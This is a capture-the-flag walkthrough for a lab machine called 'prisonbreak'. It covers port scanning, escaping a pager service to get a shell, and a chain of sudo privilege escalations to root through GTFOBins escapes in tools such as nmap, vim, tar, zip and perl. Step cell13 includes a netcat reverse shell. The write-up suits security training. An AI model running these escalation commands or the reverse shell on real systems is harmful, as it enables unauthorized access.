prisonbreak
### By b13ss3d ###
There's also a video version, if you want to check it out: prisonbreak
Port Scanning
First we perform a port scan using Rustscan to identify open ports.
rustscan -a 10.0.200.47
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
Open 10.0.200.47:22
Open 10.0.200.47:1337Once we know what ports are open, we use nmap to obtain the services and their versions running on these ports.
❯ nmap -p22,1337 -sCV -n -Pn -v 10.0.200.47 -oN scan
<SNIP>
Nmap scan report for 10.0.200.47
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 39:d8:72:f0:6f:74:58:78:ea:2b:e4:06:b9:82:67:65 (RSA)
| 256 55:8b:25:46:3d:72:08:35:46:23:4f:4c:fa:70:ba:a7 (ECDSA)
|_ 256 10:ce:b4:58:a2:c3:59:5b:0f:e7:91:e3:6a:04:fb:4e (ED25519)
1337/tcp open waste?
| fingerprint-strings:
| GenericLines, NULL:
| [?1049h
| [?1h
| MORE(1) User Commands MORE(1)
<SNIP>-p <ports>-sCV combines the options -sC and -sV.nmap help:
-sC: equivalent to --script=default-sV: Probe open ports to determine service/version info-n: Never do DNS resolution-vvv: Increase verbosity level-oN <file>: Output scan in normal format.
Port 22 is running SSH, but Nmap cannot determine the service on port 1337, so we'll need to identify it manually.
Gaining access
Using Netcat to connect to port 1337, we receive the manual for the "more" command. We can escape from this environment by pressing Esc and then typing :!bash. After pressing Enter, we obtain a shell.
Upgrading shell
To upgrade the shell, we execute the following command: script /dev/null -qc bash
Next, press Ctrl+Z and then run: stty raw -echo; fg
Finally, reset the terminal: reset xterm
With the shell back, execute: export TERM=xterm
And adjust the terminal size with: stty rows 44 cols 172
Horizontal privilege escalation
cell2 user
With the shell as the "cell1" user, execute: sudo -l
sudo -l, --listlist user's privileges.
You see that we can execute more as the "cell2" user. Elevate privileges by running: sudo -u cell2 more /etc/passwd (or any other existent file). Press Esc followed by :!bash, just as before, to become the "cell2" user.
Having done this we are "cell2" user.
cell3 user
Run sudo -l again, and you'll see that you can execute less as the "cell3" user.
Searching on Google, we found this resource that explains how to escape from less using sudo. Follow this process: sudo -u cell3 /usr/bin/less /etc/passwd Escape pressing escape then write :!bash to switch to the "cell3" user.
cell4 user
As the "cell3" user, run sudo -l:
Note that you can execute nmap as the "cell4" user. Searching for ways to escalate privileges with nmap, we found this method on GTFObins to execute commands:
First we have to be in a world readable directory like /tmp, here execute the following commands: echo 'os.execute("/bin/bash")' > test sudo -u cell4 /usr/bin/nmap --script test You now have access as "cell4".
cell5 user
As "cell4", run: sudo -l
To escalate to "cell5", we found this GTFObins resource. Execute: sudo -u cell5 /usr/bin/awk 'BEGIN {system("/bin/bash")}'
This way now we are cell5.
cell6 user
For "cell6", execute sudo -l:
To gain access as "cell6", you can use the method outlined here: sudo -u cell6 /usr/bin/find . -exec /bin/bash \; -quit
After executing this command we are cell6.
cell7 user
Run sudo -l as "cell6":
This user can use sudo to execute vim as cell7, use this method found on GTFObins. sudo -u cell7 /usr/bin/vim -c ':!/bin/bash'
And you'll be cell7.
cell8 user
For "cell8", execute sudo -l:
So execute: sudo -u cell8 /usr/bin/links /etc/passwd then press Esc twice, hit Enter, select the option to spawn an OS shell.
And you are now cell8. 
cell9 user
Being "cell8" execute sudo -l:
This user can execute /usr/bin/lynx as "cell9". Following the steps from this resource, execute: sudo -u cell9 /usr/bin/lynx /etc/passwd, then enter the options with o.
Change the Editor to /usr/bin/vim.
Accept the changes.
Finally press "e" to enter the editor, and escape from Vim by pressing Esc followed by :!bash.
cell10 user
Execute sudo -l:
cell9 can execute /usr/bin/zip as cell10.
To escalate privileges use this method was found on GTFObins. sudo -u cell10 /usr/bin/zip /tmp/test /etc/hosts -T -TT 'bash #'
cell11 user
As "cell10", run: sudo -l
cell10 can execute /bin/tar as cell11. There's this method to execute commands on GTFObins. sudo -u cell11 /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
cell12 user
Execute sudo -l:
cell11can execute /usr/bin/mutt as cell12, so execute: sudo -u cell12 /usr/bin/mutt To escape, press Esc followed by !.
Here enter bash to get a shell, as explained in this resource.
cell13 user
As "cell12", execute sudo -l:
To escalate to cell13 execute: sudo -u cell13 /usr/bin/pinfo Press ! to open a shell prompt within pinfo.
Set up a listener on another tab: nc -nlvp 443 In the pinfo shell prompt, create a reverse shell: nc -e /bin/bash <ip> 443
Replace <ip> with your actual IP address. In your listener terminal, you should receive a connection.
Upgrade the shell: script /dev/null -qc bash then press Ctrl+z and immediatelly execute the command: stty raw -echo;fg
Finally execute reset xterm
You are now cell13. 
root user
As cell13, execute sudo -l:
cell13 can execute /usr/bin/perl as root. This method on GTFObinsshows us how to execute commands: sudo /usr/bin/perl -e 'exec "/bin/bash";'
Congratulations! You now have root access.
The flags can be found in:
/root
/etc/shadow
/proc/1/environ
The home directory of every "cell" user.
Last updated